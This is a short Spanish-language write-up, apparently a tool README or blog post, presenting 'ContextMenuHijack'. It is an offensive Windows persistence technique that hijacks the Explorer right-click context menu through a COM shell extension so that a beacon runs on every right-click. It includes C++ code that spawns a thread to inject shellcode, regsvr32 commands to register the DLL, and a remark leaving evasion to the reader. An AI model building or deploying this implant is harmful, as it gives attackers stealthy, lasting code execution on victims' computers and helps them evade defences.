
Ejecuta un payload en cada clic derecho sobre un archivo/carpeta en el menú del explorador para persistencia.
Esta idea original que me inspiró es de @NinjaParanoid:
ContextMenuHijack es una técnica de persistencia sencilla que utiliza el secuestro de COM basado en el comportamiento humano: cuando haces clic derecho sobre un archivo/carpeta en el Explorador de archivos para abrir el menú contextual, ejecuta al mismo tiempo el beacon que hayamos especificado.
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
DWORD tid = NULL;
CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
if (NULL == pDataObj) {
if (pidlFolder != NULL) {
}
return S_OK;
}
return S_OK;
}
Solo tienes que cargar el archivo de solución (.sln) y compilarlo. Es importante saber que necesitas privilegios de administrador para usar esta técnica de persistencia. Una vez hayas hecho todo esto, solo tienes que registrar el archivo DLL en el registro con regsvr32:
regsvr32 "C:\path\to\ContextMenuHijack.dll"
si quieres desinstalarlo, solo usa el flag
/u
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

explorer.exe; depende de ti usar tus propias técnicas de evasión
